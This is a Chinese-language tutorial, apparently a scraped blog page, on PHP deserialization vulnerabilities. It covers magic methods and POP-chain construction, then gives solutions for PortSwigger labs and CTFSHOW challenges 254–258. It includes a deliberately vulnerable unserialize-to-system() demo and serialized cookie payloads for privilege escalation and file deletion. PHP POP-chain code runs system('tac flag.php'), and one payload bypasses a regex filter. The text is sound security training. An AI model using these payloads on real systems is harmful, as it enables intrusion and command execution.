当前位置: 首页 > news >正文

阿里巴巴网站如何做免费推广wordpress首页文章轮播

阿里巴巴网站如何做免费推广,wordpress首页文章轮播,网站流量统计怎么做,莆田建站培训知识点: 1.WEB攻防-PHP反序列化-序列化和反序列化 2.WEB攻防-PHP反序列化-常见魔术方法触发规则 3.WEB攻防-PHP反序列化-反序列化漏洞产生原因 4.WEB攻防-PHP反序列化-黑白盒&POP链构造 一、演示案例-WEB攻防-PHP反序列化-序列化和反序列化 什么是反序列化操作…

知识点:
1.WEB攻防-PHP反序列化-序列化和反序列化
2.WEB攻防-PHP反序列化-常见魔术方法触发规则
3.WEB攻防-PHP反序列化-反序列化漏洞产生原因
4.WEB攻防-PHP反序列化-黑白盒&POP链构造

一、演示案例-WEB攻防-PHP反序列化-序列化和反序列化

什么是反序列化操作?

  • 数据类型转换、主要用于数据传输。
    在这里插入图片描述

  • PHP & JavaEE & .NET & Python
    在这里插入图片描述
    在这里插入图片描述

  • 序列化:将对象转换为数组或字符串等格式

  • 反序列化:将数组或字符串等格式转换成对象

  • serialize() //将对象转换成一个字符串,序列化操作

  • unserialize() //将字符串还原成一个对象,反序列化操作

在这里插入图片描述
在这里插入图片描述

二、演示案例-WEB攻防-PHP反序列化-常见魔术方法触发规则

  • 对象逻辑
    在这里插入图片描述

__construct(): //当对象new的时候会自动调用

在这里插入图片描述

__destruct()://当对象被销毁时会被自动调用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

__sleep(): //serialize()执行时被自动调用

在这里插入图片描述
在这里插入图片描述

__wakeup(): //unserialize()时会被自动调用

在这里插入图片描述

__invoke(): //当尝试以调用函数的方法调用一个对象时会被自动调用

在这里插入图片描述
在这里插入图片描述

__toString(): //把类当作字符串使用时触发

在这里插入图片描述
在这里插入图片描述

__call(): //调用某个方法;若不存在,则会去调用__call函数

在这里插入图片描述
在这里插入图片描述

__get(): //读取对象属性时,若不存在,则会调用__get函数

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

__set(): //设置对象的属性时,若不存在,则调用__set函数

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

__isset(): //在不可访问的属性上调用isset()或empty()触发

在这里插入图片描述
在这里插入图片描述

__unset(): //在不可访问的属性上使用unset()时触发

在这里插入图片描述
在这里插入图片描述

__set_state(),调用var_export()导出类时,此静态方法会被调用
__clone(),当对象复制完成时调用
__autoload(),尝试加载未定义的类__debugInfo(),打印所需调试信息
__callStatic(): //在静态上下文中调用不可访问的方法时触发

三、演示案例-WEB攻防-PHP反序列化-反序列化漏洞产生

为什么会出现安全漏洞?

原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。

DEMO<?php
class B{
public $cmd='';
public function __destruct(){system($this->cmd);}
}
//函数引用,无对象创建触发魔术方法
unserialize($_GET['x']);

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

漏洞产生条件

可控变量、反序列函数、引用对象下的魔术方法、魔术方法里的危险函数(例如system等就会造成命令执行漏洞)

四、演示案例-WEB攻防-PHP反序列化-黑白盒&POP链构造

反序列化漏洞如何利用?- POP链构造

POP:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,序列化攻击都在PHP魔术方法中出现可利用的漏洞,因自动调用触发漏洞,但如关键代码没在魔术方法中,而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来。
-反序列化常见起点
-反序列化常见跳板
-反序列化常见终点
-POP链核心就是代码有用的留下,没用的删掉

在这里插入图片描述

黑盒-portswigger-数据序列化

真实情况下,黑盒很难挖到反序列化(基本都是看代码来挖)
靶场地址:https://portswigger.net/web-security/all-labs#insecure-deserialization

DEMO1-反序列化越权

在这里插入图片描述
在这里插入图片描述

O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}

在这里插入图片描述
在这里插入图片描述

DEMO2-反序列化越权

在这里插入图片描述

在这里插入图片描述

O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

在这里插入图片描述
在这里插入图片描述

DEMO3-反序列化导致任意文件删除漏洞

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"elrtoxj3rcx3n1ip4u723mk839qht90h";s:11:"avatar_link";s:19:"users/wiener/avatar";}

白盒-CTFSHOW-训练POP链构造(POP链核心就是代码有用的留下,没用的删掉)

254-对象引用执行逻辑

在这里插入图片描述

payload:
username=xxxxxx&password=xxxxxx

255-反序列化变量修改

在这里插入图片描述

POP链CODE:
1、不修改代码的用户密码
<?php
class ctfShowUser{public $isVip=true;
}
$a=new ctfShowUser();
echo urlencode(serialize($a));
?>

在这里插入图片描述

payload:
Get:username=xxxxxx&password=xxxxxx
Cookie:user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

在这里插入图片描述

POP链CODE:
2、修改代码的用户密码
<?php
class ctfShowUser{public $username='test';public $password='test123';public $isVip=true;
}
$a=new ctfShowUser();
echo urlencode(serialize($a));
?>

在这里插入图片描述

payload:
Get:username=test&password=test123
Cookie:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22test%22%3Bs%3A8%3A%22password%22%3Bs%3A7%3A%22test123%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

在这里插入图片描述

256-反序列化参数修改

在这里插入图片描述

POP链CODE:
<?php
class ctfShowUser{public $username='test';public $password='test1';public $isVip=true;
}
$a=new ctfShowUser();
echo urlencode(serialize($a));
?>

在这里插入图片描述

payload:
GET:username=test&password=test1
COOKIE:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22test%22%3Bs%3A8%3A%22password%22%3Bs%3A5%3A%22test1%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

在这里插入图片描述

257-反序列化参数修改&对象调用逻辑

在这里插入图片描述

POP链CODE:
<?php
class ctfShowUser{public $class = 'backDoor';
public function __construct(){$this->class=new backDoor();}
}
class backDoor{public $code='system("tac flag.php");';}
echo urlencode(serialize(new ctfShowUser));
?>

在这里插入图片描述

payload:
GET:username=xxxxxx&password=xxxxxx
COOKIE:user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D

在这里插入图片描述

258-反序列化参数修改&对象调用逻辑&正则

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

POP链CODE:
<?php
class ctfShowUser{public $class = 'backDoor';public function __construct(){$this->class=new backDoor();}
}
class backDoor{public $code="system('tac flag.php');";
}
$a=serialize(new ctfShowUser());
$b=str_replace(':11',':+11',$a);
$c=str_replace(':8',':+8',$b);
echo urlencode($c);
?>

在这里插入图片描述

payload:
GET:username=123&password=123
COOKIE:user=O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%27tac+flag.php%27%29%3B%22%3B%7D%7D

在这里插入图片描述

http://www.dtcms.com/a/561221.html

相关文章:

  • 缓存三大问题及解决方案
  • 深度学习周报(10.27~11.2)
  • 怎么做便民信息网站原创小说手机网站制作需要多少钱
  • Java外功精要——Spring AOP
  • 线程从共享队列取任务的底层机制
  • 一站式网站建设报价怎样做商城网站
  • 宜春公司网站建设网页改进方案
  • 「经典数字题」集合 | C/C++
  • centos7实测
  • 【3DV 进阶-5】3D生成中 Inductive Bias (归纳偏置)的技术路线图
  • HOT100题打卡第26天——动态规划
  • 第五章 二项式系数
  • 制作网站语言网络营销方法有什么
  • 合肥网站建站推广从零开始做电影网站
  • 电商Web 渗透测试小小清单
  • 做信息流推广需要建立网站么最基本的网站设计
  • 基于双向时序卷积网络与门控循环单元(BiTCN-GRU)混合模型的时间序列预测MATLAB代码
  • DevOps(devops/k8s/docker/Linux)学习笔记-2
  • 三点水网站建设wordpress wp-polls
  • 用数据照亮成长之路:PandaCoder Git 统计工具窗口
  • FPGA的LVDS接口电压
  • 【每天一个AI小知识】:什么是Embedding?
  • 南昌网站排名优化免费提供空间的网站
  • 三种服务生命周期
  • Mybatis的添加和修改功能
  • Linux 安全文件传输完全指南:sftp 与 scp 的深度解析引言
  • Mysql基础3
  • 上海cms网站建设珠海网站建设 科速
  • 有没有可以做游戏的网站电商网课教材
  • 【自然语言处理】生成式语言模型GPT复现详细技术方案